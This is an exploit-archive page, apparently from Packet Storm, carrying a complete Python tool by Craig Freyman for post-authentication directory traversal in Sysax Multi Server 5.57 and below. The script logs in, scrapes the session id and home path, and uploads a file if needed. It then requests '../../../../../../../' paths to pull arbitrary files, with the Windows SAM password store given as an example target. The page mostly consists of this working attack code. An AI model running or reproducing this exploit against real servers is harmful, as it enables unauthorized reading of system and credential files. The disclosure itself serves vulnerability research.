what you don't know can hurt you

Sysax Multi Server 5.57 Directory Traversal

Sysax Multi Server 5.57 Directory Traversal
Posted Apr 4, 2012
Authored by Craig Freyman

Sysax Multi Server versions 5.57 and below remote directory traversal tool that requires authentication.

tags | exploit, remote
MD5 | 8015e6c77bca5ceabb2d04bd597627ff

Sysax Multi Server 5.57 Directory Traversal

Change Mirror Download
#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit
#Date Discovered: March 27, 2012
#Vendor Contacted: March 29, 2012
#Vendor Response: April 3, 2012
#Vendor Fixed: (Currently working on fix, check my site for update)
#Details: http://www.pwnag3.com/2012/04/sysax-directory-traversal-exploit.html
##########################################################################################################

import socket,sys,time,re,base64,urllib

def main():
#base64 encode the provided creds
creds = base64.encodestring(user+"\x0a"+password)

print "\n"
print "****************************************************************************"
print " Sysax Multi Server <= 5.57 Directory Traversal Tool (Post Auth) "
print " by @cd1zz www.pwnag3.com "
print " Getting "+getfile+" from " + target + " on port " + str(port)
print "****************************************************************************"

#setup post for login
login = "POST /scgi?sid=0&pid=dologin HTTP/1.1\r\n"
login += "Host: \r\n"
login += "http://"+target+"/scgi?sid=0&pid=dologin\r\n"
login += "Content-Type: application/x-www-form-urlencoded\r\n"
login += "Content-Length: 15\r\n\r\n"
login += "fd="+creds+"\n\n"

#send post and login creds
try:
r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
r.connect((target, port))
print "[*] Logging in"
r.send(login)
except Exception, e:
print "[-] Could not login"
print e

#loop the recv sock so we get the full page
page = ''
fullpage = ''
while "</html>" not in fullpage:
page = r.recv(4096)
fullpage += page
time.sleep(1)

#regex the sid from the page
global sid
sid = re.search(r'sid=[a-zA-Z0-9]{40}',fullpage,re.M)
if sid is None:
print "[x] Could not login. User and pass correct?"
sys.exit(1)
time.sleep(1)

#regex to find user's path
print "[*] Finding your home path"
global path
path = re.search(r'file=[a-zA-Z]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M)
time.sleep(1)

#if that doesn't work, try to upload a file and check again
if path is None:
print "[-] No files found, I will try to upload one for you."
print "[-] If you don't have rights to do this, it will fail."

upload = "POST /scgi?"+str(sid.group(0))+"&pid=uploadfile_name1.htm HTTP/1.1\r\n"
upload += "Host:\r\n"
upload += "Content-Type: multipart/form-data; boundary=---------------------------97336096252362005297691620\r\n"
upload += "Content-Length: 219\r\n\r\n"
upload += "-----------------------------97336096252362005297691620\r\n"
upload += "Content-Disposition: form-data; name=\"upload_file\"; filename=\"file.txt\"\r\n"
upload += "Content-Type: text/plain\r\n"
upload += "-----------------------------97336096252362005297691620--\r\n\r\n"

u = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
u.connect((target, port))
u.send(upload + "\r\n")
page = ''
fullpage = ''
while "</html>" not in fullpage:
page = u.recv(4096)
fullpage += page
path = re.search(r'file=[a-zA-Z0-9]:\\[\\.a-zA-Z_0-9 ]{1,255}[\\$]',fullpage,re.M)
time.sleep(2)
if path is None:
print "\n[x] It failed, you probably don't have rights to upload."
print "[x] Please retry the script a few times."
print "[x] You need at least one file in the directory because we need"
print "[x] to append our directory traversal to the end of your path."
sys.exit(1)
print "[+] Got it => " + path.group(0)
time.sleep(1)
r.close()

def dirtrav():
#here is the dir trav
url = "http://"+target+"/scgi?"+str(sid.group(0))+"&"+path.group(0)+"../../../../../../../"+getfile
try:
retrieved_file = urllib.urlopen(url)
filename = raw_input("[+] Got your file. What file name do you want to save it as? ")
output = open(filename,'wb')
output.write(retrieved_file.read())
output.close()
print "[*] Done!"
except Exception, e:
print "[x] Either the file doesn't exist or you mistyped it. Error below:"
print "[x] You can also try to browse this site manually:"
print "[x] " + url
print e

def keepgoing():
cont = raw_input("[*] Do you want another file (y/n)? ")
while cont == "y":
global getfile
getfile = raw_input("[*] Enter the location of the new file: ")
dirtrav()
cont = raw_input("[*] Do you want another file (y/n)? ")
else:
sys.exit(1)

if __name__ == '__main__':
if len(sys.argv) != 6:
print "[+] Usage: ./filename <Target IP> <Port> <User> <Password> <File>"
print "[+] File examples => windows/repair/sam or boot.ini"
sys.exit(1)

target, port, user, password, getfile = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4], sys.argv[5]

main()
dirtrav()
keepgoing()

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    14 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close